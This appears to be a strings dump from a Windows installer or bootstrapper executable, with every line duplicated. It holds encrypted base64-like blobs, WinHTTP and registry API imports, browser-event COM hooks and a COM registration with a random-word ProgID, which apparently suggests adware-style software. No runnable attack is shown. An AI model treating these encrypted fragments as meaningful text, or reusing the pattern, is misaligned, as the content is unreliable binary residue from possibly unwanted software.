2Ub46wAG7ILlcuNK7PAECPiT5WjjR/rwABTCpMxN Ezw6yEC7JTQUOR12 cHC/GV3E3Wevb6Gwu odZT7kzs7A==

w1ra8xAl65PNUORq9voUDPuD

w1ra8xAl65PNUORq9voUDPuD

2Uzw zML a7NWudk wEBvmC7g==

2Uzw zML a7NWudk wEBvmC7g==

xkbx9B4J cffUPgJ7u0YBPuUylr5CertEgK iN8fr02kvwcG7ILXS/kJ7fYNAr7C3ROqWfvxEw7wgJlM41P7v1IDlA==

xkbx9B4J cffUPgJ7u0YBPuUylr5CertEgK iN8fr02kvwcG7ILXS/kJ7fYNAr7C3ROqWfvxEw7wgJlM41P7v1IDlA==

CInstallationManager::IsPartOfInstallation value=%s

CInstallationManager::IsPartOfInstallation value=%s

CInstallationManager::SetComponentInstallationEnded %S

CInstallationManager::SetComponentInstallationEnded %S

%Y-%m-%d %H:%M:%S

%Y-%m-%d %H:%M:%S

CProgressUpdateRequest::CreateInstance %S

CProgressUpdateRequest::CreateInstance %S

CProgressUpdateRequest::ProgressUpdate %S

CProgressUpdateRequest::ProgressUpdate %S

Send progress update request %s

Send progress update request %s

Progress Request for '%S' return %s

Progress Request for '%S' return %s

yX3/7Bw0/Y/cW/9F 9cWCfqL3E2wE93tEgbqgvBR V3/8xsz/5TSH8xI9/NXE/HH2FvuCertHgD5gssFqgzmlQ==

yX3/7Bw0/Y/cW/9F 9cWCfqL3E2wE93tEgbqgvBR V3/8xsz/5TSH8xI9/NXE/HH2FvuCertHgD5gssFqgzmlQ==

VERSION.dll

VERSION.dll

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

RegDeleteKeyW

RegDeleteKeyW

RegCloseKey

RegCloseKey

RegQueryInfoKeyW

RegQueryInfoKeyW

RegEnumKeyExW

RegEnumKeyExW

RegOpenKeyExW

RegOpenKeyExW

RegCreateKeyExW

RegCreateKeyExW

ADVAPI32.dll

ADVAPI32.dll

SHELL32.dll

SHELL32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

Secur32.dll

Secur32.dll

WinHttpCloseHandle

WinHttpCloseHandle

WinHttpOpen

WinHttpOpen

WinHttpSetOption

WinHttpSetOption

WinHttpGetProxyForUrl

WinHttpGetProxyForUrl

WinHttpCrackUrl

WinHttpCrackUrl

WinHttpConnect

WinHttpConnect

WinHttpOpenRequest

WinHttpOpenRequest

WinHttpSetStatusCallback

WinHttpSetStatusCallback

WinHttpSendRequest

WinHttpSendRequest

WinHttpQueryHeaders

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpReadData

WinHttpReceiveResponse

WinHttpReceiveResponse

WINHTTP.dll

WINHTTP.dll

GetProcessHeap

GetProcessHeap

GetCPInfo

GetCPInfo

zcÁ

zcÁ

.?AVAsyncWinHttp@@

.?AVAsyncWinHttp@@

.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AUISupportErrorInfo@@

.?AUISupportErrorInfo@@

.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@

.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

cousins.epoxied.1 = s 'Inst Class'

cousins.epoxied.1 = s 'Inst Class'

CLSID = s '{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}'

CLSID = s '{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}'

cousins.epoxied = s 'Inst Class'

cousins.epoxied = s 'Inst Class'

CurVer = s 'cousins.epoxied.1'

CurVer = s 'cousins.epoxied.1'

ForceRemove {d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143} = s 'Inst Class'

ForceRemove {d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143} = s 'Inst Class'

ProgID = s 'cousins.epoxied.1'

ProgID = s 'cousins.epoxied.1'

VersionIndependentProgID = s 'cousins.epoxied'

VersionIndependentProgID = s 'cousins.epoxied'

val ServerExecutable = s '%MODULE_RAW%'

val ServerExecutable = s '%MODULE_RAW%'

TypeLib = s '{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}'

TypeLib = s '{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}'

.sssh

.sssh

REÚ

REÚ

\.crr

\.crr